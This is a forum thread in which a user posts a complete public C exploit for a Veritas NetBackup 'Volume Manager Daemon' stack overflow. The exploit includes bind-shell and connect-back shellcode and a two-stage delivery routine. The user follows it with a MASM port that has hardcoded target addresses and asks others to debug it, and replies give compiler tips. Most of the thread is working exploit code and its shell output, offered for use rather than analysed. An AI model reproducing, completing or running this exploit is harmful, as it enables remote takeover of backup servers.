about language question

Тема в разделе "WASM.ENGLISH", создана пользователем dcskm4200, 10 фев 2006.

  1. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    /*



    DESCRIPTION



    Veritas NetBackup Stack Overflow (tcp/13701)

    "Volume Manager Daemon" Module



    Advisories

    http://www.idefense.com/intelligence/vulnerabilities/display.php?id=3 36

    http://www.frsirt.com/english/advisories/2005/2349



    USAGE



    C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0

    Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.

    Sending first buffer.

    Sending second buffer.



    C:\NetBackup>nc 192.168.0.200 4444

    Microsoft Windows 2000 [versie 5.00.2195]

    (C) Copyright 1985-2000 Microsoft Corp.



    C:\WINNT\system32>



    INFORMATION



    I wrote this just for educational purposes :).



    Because the buffer is only very small, I had to write small shellcode.

    The code is less than 100 bytes, and there are 6 bytes left. So there

    is still space to improve it. The stack seems to be static, every run

    at the exact same location.



    I used the Import Address Table (that looks like this):



    (taken from v5.1)

    Import Address Table

    00447230 (send)

    00447234 (recv)

    00447238 (accept)

    00447240 (listen)

    0044724C (connect)

    00447268 (closesocket)

    00447284 (bind)

    00447288 (socket)



    Using that shellcode I retrieve the "second" shellcode. This can be ANY

    code, and ANY size. No limitations.



    Tested on Windows 2000 Professional, Service Pack 4, Dutch.

    Tested on Veritas NetBackup 4.5, 5.0, 5.1 with some Maintenance Packs.

    (not all).



    Enjoy.



    */

    #include <winsock2.h>

    #include <stdio.h>

    #pragma comment(lib,"ws2_32")



    DWORD WINAPI SendShellcode(LPVOID lpParam);

    int iLocalOpenPort;



    /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */

    char szShellcode[] =

    "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd2"

    "\x4a\xe7\xed\x83\xeb\xfc\xe2\xf4\x2e\x20\x0c\xa0\x3a\xb3\x18\x12"

    "\x2d\x2a\x6c\x81\xf6\x6e\x6c\xa8\xee\xc1\x9b\xe8\xaa\x4b\x08\x66"

    "\x9d\x52\x6c\xb2\xf2\x4b\x0c\xa4\x59\x7e\x6c\xec\x3c\x7b\x27\x74"

    "\x7e\xce\x27\x99\xd5\x8b\x2d\xe0\xd3\x88\x0c\x19\xe9\x1e\xc3\xc5"

    "\xa7\xaf\x6c\xb2\xf6\x4b\x0c\x8b\x59\x46\xac\x66\x8d\x56\xe6\x06"

    "\xd1\x66\x6c\x64\xbe\x6e\xfb\x8c\x11\x7b\x3c\x89\x59\x09\xd7\x66"

    "\x92\x46\x6c\x9d\xce\xe7\x6c\xad\xda\x14\x8f\x63\x9c\x44\x0b\xbd"

    "\x2d\x9c\x81\xbe\xb4\x22\xd4\xdf\xba\x3d\x94\xdf\x8d\x1e\x18\x3d"

    "\xba\x81\x0a\x11\xe9\x1a\x18\x3b\x8d\xc3\x02\x8b\x53\xa7\xef\xef"

    "\x87\x20\xe5\x12\x02\x22\x3e\xe4\x27\xe7\xb0\x12\x04\x19\xb4\xbe"

    "\x81\x19\xa4\xbe\x91\x19\x18\x3d\xb4\x22\xf6\xb1\xb4\x19\x6e\x0c"

    "\x47\x22\x43\xf7\xa2\x8d\xb0\x12\x04\x20\xf7\xbc\x87\xb5\x37\x85"

    "\x76\xe7\xc9\x04\x85\xb5\x31\xbe\x87\xb5\x37\x85\x37\x03\x61\xa4"

    "\x85\xb5\x31\xbd\x86\x1e\xb2\x12\x02\xd9\x8f\x0a\xab\x8c\x9e\xba"

    "\x2d\x9c\xb2\x12\x02\x2c\x8d\x89\xb4\x22\x84\x80\x5b\xaf\x8d\xbd"

    "\x8b\x63\x2b\x64\x35\x20\xa3\x64\x30\x7b\x27\x1e\x78\xb4\xa5\xc0"

    "\x2c\x08\xcb\x7e\x5f\x30\xdf\x46\x79\xe1\x8f\x9f\x2c\xf9\xf1\x12"

    "\xa7\x0e\x18\x3b\x89\x1d\xb5\xbc\x83\x1b\x8d\xec\x83\x1b\xb2\xbc"

    "\x2d\x9a\x8f\x40\x0b\x4f\x29\xbe\x2d\x9c\x8d\x12\x2d\x7d\x18\x3d"

    "\x59\x1d\x1b\x6e\x16\x2e\x18\x3b\x80\xb5\x37\x85\x22\xc0\xe3\xb2"

    "\x81\xb5\x31\x12\x02\x4a\xe7\xed";



    char szBuffer[] =

    // We cannot use this small part.

    "a"

    "AAAAAAAAAAAAAAAAAAAA"

    "AAAAAAAAAAAAAAAAAAAA"

    "AAAAAAAAAAAAAAAAAAAA"

    "AAAAAAAAAAAAAAAAAAA"



    // Since the buffer is so small, we even need a part of

    // the SOCKADDR_IN structure. No problem.



    // struct sockaddr_in {

    "BB" // sin_family

    "BB" // sin_port

    "BBBB" // in_addr

    // "BBBBBBBB" // sin_zero

    // }



    // 'START'



    // Move the stackpointer. (0x0012F??? -> 0x0012F000)

    "\xC1\xEC\x0C" // SHR ESP, 0x0C

    "\xC1\xE4\x0C" // SHL ESP, 0x0C



    // Call socket().

    "\x33\xDB" // XOR EBX, EBX

    "\x53" // PUSH EBX

    "\x43" // INC EBX

    "\x53" // PUSH EBX

    "\x43" // INC EBX

    "\x53" // PUSH EBX

    "\xBB\x88\x72\x44\x00" // MOV EBX, 447288 [socket()]

    "\xFF\x13" // JMP DWORD PTR [EBX]

    "\x8B\xF8" // MOV EDI, EAX

    // [edi -> socket]



    // Call connect().

    "\x33\xDB" // XOR EBX, EBX

    "\xB3\x16" // MOV BL, 16

    "\x53" // PUSH EBX

    "\xBB\x60\xF3\x12\x00" // MOV EBX, 12F360

    "\x53" // PUSH EBX

    "\x57" // PUSH EDI

    "\xBB\x4C\x72\x44\x00" // MOV EBX, 44724C [connect()]

    "\xFF\x13" // JMP DWORD PTR [EBX]



    // We need space.

    "\x8B\xD4" // MOV EDX, ESP

    "\x80\xC6\x01" // ADD DH, 1



    // Call recv().

    "\x33\xDB" // XOR EBX, EBX

    "\x53" // PUSH EBX

    "\x43" // INC EBX

    "\xC1\xE3\x10" // SHL EBX, 8 [1 -> 65536]

    "\x53" // PUSH EBX

    "\x52" // PUSH EDX

    "\x57" // PUSH EDI

    "\xBB\x34\x72\x44\x00" // MOV EBX, 447234 [recv()]

    "\xFF\x13" // JMP DWORD PTR [EBX]



    // And again.

    "\x8B\xD4" // MOV EDX, ESP

    "\x80\xC6\x01" // ADD DH, 1



    // Jump to our shellcode.

    "\xFF\xE2" // JMP EDX



    "O"

    "W"

    "N"

    "E"

    "D"

    "!"



    "\x68\xF3\x12\x00" // Here our code starts :).

    "\x00\xF0\x12\x00"; // Just a random readable address.



    // This is the NOT-interesting part :).



    DWORD main(int argc, char *argv[]) {

    printf("Veritas NetBackup v4/v5/v6 \"Volume Manager Daemon\" Stack Overflow.\n");



    // We need a local port and ip because our first buffer is way too small

    // to contain our complete shellcode. We use a small shellcode first to

    // retrieve the second shellcode. The only method that fitted as first

    // shellcode was a connect-back shellcode. For the second we got LOADS of

    // space :).

    if (argc<5) {

    printf("Usage: %s <local ip> <local port> <remote ip> <type>\n\n", argv[0]);

    printf("Types (tested):\n");

    printf(" 0 - NetBackup v5.0_1A\n");

    printf(" NetBackup v5.0_2\n");

    printf(" NetBackup v5.0_3\n");

    printf(" NetBackup v5.1\n\n");

    return NULL;

    }



    WSADATA wsa;

    WSAStartup(MAKEWORD(2,0), &wsa);



    sockaddr_in strTarget;

    memset(&strTarget, 0, sizeof(strTarget));

    strTarget.sin_addr.s_addr = inet_addr(argv[3]);

    strTarget.sin_family = AF_INET;

    strTarget.sin_port = htons(13701);



    iLocalOpenPort = atoi(argv[2]);

    HANDLE hStage2 = CreateThread(NULL, 0, SendShellcode, 0, 0, 0);



    SOCKET sTarget = socket(AF_INET, SOCK_STREAM, 0);

    int iResult = connect(sTarget, (struct sockaddr *)&strTarget, sizeof(strTarget));



    if (iResult != SOCKET_ERROR) {

    printf("Sending first buffer.\n");

    // Fill in the structure.

    unsigned long family = AF_INET;

    memcpy(szBuffer + 80, &family, 2);

    unsigned long port = htons(iLocalOpenPort);

    memcpy(szBuffer + 82, &port, 2);

    unsigned long ip = inet_addr(argv[1]);

    memcpy(szBuffer + 84, &ip, 4);



    send(sTarget, szBuffer, sizeof(szBuffer)-1, 0);

    closesocket(sTarget);

    }



    WaitForSingleObject(hStage2, 3000);

    WSACleanup();

    return NULL;

    }



    DWORD WINAPI SendShellcode(LPVOID lpParam) {

    SOCKET sTarget;

    SOCKET sAccept;

    struct hostent *hp;

    struct sockaddr_in strTarget;

    struct sockaddr_in strAccept;



    int iStrSize = sizeof(strTarget);



    memset(&strTarget, 0, sizeof(strTarget));

    strTarget.sin_addr.s_addr = INADDR_ANY;

    strTarget.sin_family = AF_INET;

    strTarget.sin_port = htons(iLocalOpenPort);



    sTarget = socket(AF_INET, SOCK_STREAM, 0);

    bind(sTarget, (struct sockaddr *)&strTarget, iStrSize);

    listen(sTarget, 2);

    sAccept = accept(sTarget, (struct sockaddr *)&strAccept, &iStrSize);



    if (sAccept != INVALID_SOCKET) {

    printf("Sending second buffer.\n");

    send(sAccept, szShellcode, sizeof(szShellcode) - 1, 0);

    closesocket(sAccept);

    }



    return NULL;

    }



    // milw0rm.com [2006-01-16]



    ;===============================================================

    Hey,all

    the above code has been translated into asm. the exe can't work.

    Please help me checking solecism.



    [​IMG] _40491904__rt_1.rar
     
  2. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    .586

    .model flat, stdcall

    option casemap :none

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    include \masm32\include\windows.inc

    include \masm32\include\kernel32.inc

    include \masm32\include\Ws2_32.inc

    include \masm32\include\masm32.inc

    include \masm32\include\User32.inc

    include \masm32\include\debug.inc



    includelib \masm32\lib\User32.lib

    includelib \masm32\lib\kernel32.lib

    includelib \masm32\lib\Ws2_32.lib

    includelib \masm32\lib\masm32.lib

    includelib \masm32\lib\debug.lib



    include \masm32\macros\macros.asm

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    .data?

    wsd WSADATA<?>

    strTarget sockaddr_in<?>

    strLocal sockaddr_in<?>

    iLocalOpenPort dd ?

    hStage2 dd ?

    sTarget dd ?

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    .data

    szArgv1 db "100.160.1.99",0

    szArgv2 db "4444",0

    szArgv3 db "100.160.1.201",0

    szArgv4 db "0",0

    Msg1 db "Sending first buffer.",0

    Msg2 db "Sending senond buffer.",0

    szCaption db "Test",0



    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    .code

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    szShellcode db 43,201,131,233,176,217,238,217,116,36,244,91,129,115,19,210

    db 74,231,237,131,235,252,226,244,46,32,12,160,58,179,24,18

    db 45,42,108,129,246,110,108,168,238,193,155,232,170,75,08,102

    db 157,82,108,178,242,75,12,164,89,126,108,236,60,123,39,116

    db 126,206,39,153,213,139,45,224,211,136,12,25,233,30,195,197

    db 167,175,108,178,246,75,12,139,89,70,172,102,141,86,230,06

    db 209,102,108,100,190,110,251,140,17,123,60,137,89,9,215,102

    db 146,70,108,157,206,231,108,173,218,20,143,99,156,68,11,189

    db 45,156,129,190,180,34,212,223,186,61,148,223,141,30,24,61

    db 186,129,10,17,233,26,24,59,141,195,02,139,83,167,239,239

    db 135,32,229,18,02,34,62,228,39,231,176,18,04,25,180,190

    db 129,25,164,190,145,25,24,61,180,34,246,177,180,25,110,12

    db 71,34,67,247,162,141,176,18,04,32,247,188,135,181,55,133

    db 118,231,201,04,133,181,49,190,135,181,55,133,55,03,97,164

    db 133,181,49,189,134,30,178,18,02,217,143,10,171,140,158,186

    db 45,156,178,18,02,44,141,137,180,34,132,128,91,175,141,189

    db 139,99,43,100,53,32,163,100,48,123,39,30,120,180,165,192

    db 44,08,203,126,95,48,223,70,121,225,143,159,44,249,241,18

    db 167,14,24,59,137,29,181,188,131,27,141,236,131,27,178,188

    db 45,154,143,64,11,79,41,190,45,156,141,18,45,125,24,61

    db 89,29,27,110,22,46,24,59,128,181,55,133,34,192,227,178

    db 129,181,49,18,02,74,231,237



    szBuffer db "a"

    db "AAAAAAAAAAAAAAAAAAAA"

    db "AAAAAAAAAAAAAAAAAAAA"

    db "AAAAAAAAAAAAAAAAAAAA"

    db "AAAAAAAAAAAAAAAAAAA"



    db "BB"

    db "BB"

    db "BBBB"



    db 193,236,12

    db 193,228,12



    db 51,219

    db 83

    db 67

    db 83

    db 67

    db 83

    db 187,136,114,68,00

    db 255,19

    db 139,248



    db 51,219

    db 179,22

    db 83

    db 187,96,243,18,00

    db 83

    db 87

    db 187,76,114,68,00

    db 255,19



    db 139,212

    db 128,198,01



    db 51,219

    db 83

    db 67

    db 193,227,16

    db 83

    db 82

    db 87

    db 187,52,114,68,00

    db 255,19



    db 139,212

    db 128,198,01



    db 255,226



    db "O"

    db "W"

    db "N"

    db "E"

    db "D"

    db "!"



    db 104,243,18,00

    db 00,240,18,00

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    memcopy_ proc uses edi esi ebx pDest:dword, pSource:dword, sizeDat:dword



    mov ecx, sizeDat

    mov esi, pSource

    mov edi, pDest

    mov eax, ecx

    shr ecx, 2

    rep movsd

    mov ecx, eax

    and ecx, 3

    rep movsb

    ret



    memcopy_ endp

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    memset proc uses edi pDest:dword, chres:dword, sizeDat:dword



    mov ecx, sizeDat

    xor eax, eax

    mov edi, pDest

    mov edx, ecx

    shr ecx, 2

    rep stosd

    mov ecx, edx

    and ecx, 3

    rep stosb

    ret



    memset endp

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    SendShellCode proc

    LOCAL sTarget1 : SOCKET

    LOCAL sAccept1 : SOCKET

    LOCAL strTarget1: sockaddr_in

    LOCAL strAccept1: sockaddr_in



    invoke memset, addr strTarget1, 0, sizeof strTarget1



    mov strTarget1.sin_family, AF_INET

    mov strTarget1.sin_addr, INADDR_ANY

    invoke htons, iLocalOpenPort

    mov strTarget1.sin_port, ax



    invoke socket, AF_INET, SOCK_STREAM, 0

    mov sTarget1,eax



    invoke bind, sTarget1, addr strTarget1, sizeof strTarget1

    invoke listen,sTarget1,2

    PrintHex sTarget1

    invoke accept,sTarget1,addr strAccept1,sizeof strAccept1

    mov sAccept1,eax

    PrintHex sAccept1



    .if sAccept1 != INVALID_SOCKET

    invoke MessageBox,NULL,ADDR Msg2,ADDR szCaption,MB_OK

    invoke send,sAccept1,offset szShellcode, sizeof szShellcode - 1,0

    invoke closesocket,sAccept1

    .endif

    ret



    SendShellCode endp

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>

    start:

    invoke WSAStartup, 202h, addr wsd

    invoke memset, addr strTarget, 0, sizeof strTarget



    mov strTarget.sin_family, AF_INET

    invoke inet_addr,addr szArgv3

    mov strTarget.sin_addr, eax

    invoke htons, 13701

    mov strTarget.sin_port, ax

    invoke a2dw,addr szArgv2

    mov iLocalOpenPort,eax



    invoke CreateThread, 0, 0, addr SendShellCode, 0, 0, 0

    mov hStage2,eax



    invoke socket, AF_INET, SOCK_STREAM, 0

    mov sTarget,eax



    invoke connect, sTarget, addr strTarget, sizeof strTarget

    .if eax != SOCKET_ERROR

    invoke MessageBox,NULL,ADDR Msg1,ADDR szCaption,MB_OK



    mov strLocal.sin_family, AF_INET

    invoke memcopy_, szBuffer+80, addr strLocal.sin_family, 2



    invoke htons, iLocalOpenPort

    mov strLocal.sin_port, ax

    invoke memcopy_, szBuffer+82, addr strLocal.sin_port, 2



    invoke inet_addr,addr szArgv1

    mov strLocal.sin_addr, eax

    invoke memcopy_, szBuffer+84, addr strLocal.sin_addr, 4



    invoke send,sTarget,offset szBuffer, sizeof szBuffer - 1,0

    invoke closesocket,sTarget

    .endif

    invoke WaitForSingleObject,hStage2,3000

    invoke WSACleanup

    invoke ExitProcess, 0

    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>



    end start



    ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>
     
  3. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    No any response.

    the code maybe a heap of garbage.
     
  4. cresta

    cresta Active Member

    Публикаций:
    0
    Регистрация:
    13 июн 2004
    Сообщения:
    2.257
    You can compile your C code into executable, than load it into OllyDbg and copy asm-listing from OllyDbg to your .asm file.
     
  5. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    Hello,cresta

    Thanks for response



    Borland c++

    [Linker Fatal Error] Fatal: Unable to open file 'WS2_32.OBJ'
     
  6. ssx

    ssx Member

    Публикаций:
    0
    Регистрация:
    19 авг 2003
    Сообщения:
    336
  7. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    hello,ssx

    Thanks.

    please attach exe which created by MS VC.
     
  8. ssx

    ssx Member

    Публикаций:
    0
    Регистрация:
    19 авг 2003
    Сообщения:
    336
    you can download ms vc compiler from microsoft site.



    I don't want to attach any exploits
     
  9. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    ;--------------------------------

    push security_cookie

    call [ebp+@security_check_cookie]

    ;--------------------------------

    the api help?
     
  10. ssx

    ssx Member

    Публикаций:
    0
    Регистрация:
    19 авг 2003
    Сообщения:
    336
    you can ignore this



    just delete it
     
  11. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    Can the code work?
     
  12. cresta

    cresta Active Member

    Публикаций:
    0
    Регистрация:
    13 июн 2004
    Сообщения:
    2.257
    yes.

    Or remove option /GZ from vc++ compiler's command line
     
  13. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    Hello,creata

    ;===================================================

    invoke accept,hTsock,addr strAccept,sizeof strAccept ;<=Error

    mov hAsock,eax

    PrintHex hAsock

    ;===================================================

    the code in frist buffer can't work on Target PC.



    ASM LINK:

    \masm32\bin\Link /subsystem:windows /section:.text,ERW %name%.obj

    is it right?
     
  14. Guest

    Guest Guest

    Публикаций:
    0
    When download ws2_32.obj? What is a library?
     
  15. dcskm4200

    dcskm4200 New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2004
    Сообщения:
    173
    Адрес:
    China
    Hello,Аноним

    I used MS-VC to created exe file, but the code can't work.

    msg:

    "Veritas NetBackup v4/v5/v6 "Volume Manager Daemon" Stack Overflow.

    Sending first buffer."

    i didn't know why the second buffer can't be sent.



    regards